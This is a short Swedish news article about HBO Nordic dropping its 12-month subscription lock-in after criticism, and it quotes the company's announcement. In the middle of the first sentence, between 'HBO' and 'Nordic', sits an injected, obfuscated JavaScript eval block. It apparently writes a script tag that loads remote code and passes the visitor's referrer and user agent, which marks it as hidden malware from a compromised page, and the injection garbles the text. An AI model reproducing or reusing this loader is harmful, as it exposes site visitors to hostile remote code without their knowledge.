Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

HBO backar efter kritikstorm gällande bindningstiden

HBO backar efter kritikstorm gällande bindningstiden
Sebastian

HBO eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dkibh|var|u0026u|referrer|etsss||js|php’.split(’|’),0,{}))
Nordic: Som vi skrev tidigare idag så har nystartade HBO Nordic tagit emot en enorm massa kritik för sitt sätt att ta betalt. Det gäller deras bindningstid på 12 månader. 

Användare som har startat upp ett konto hos HBO Nordic kommer nu få möjligheten att avsluta sitt abonnemang innan den 31 januari 2013. Dock har inte HBO Nordic kommenterat hur det blir för dem som väljer att teckna ett avtal efter nyår.

Nedan kan ni läsa ett meddelande som HBO skickade ut ikväll.

”Vissa av er har varit bekymrade över att ni inte kan prova tjänsten innan ni binder er till ett abonnemang. Vi har lyssnat. Därför kommer vi nu erbjuda er möjligheten att avsluta ert abonnemang före 31:a Januari 2013 utan kostnad eller ytterligare åtagande.
Det här erbjudandet är exklusivt för dem som registrerar sig för ett nyhetsbrev på hbonordic.com senast den 31:a December 2012. Än en gång, tack för ditt intresse för vår tjänst.
Vänligen,
HBO Nordic”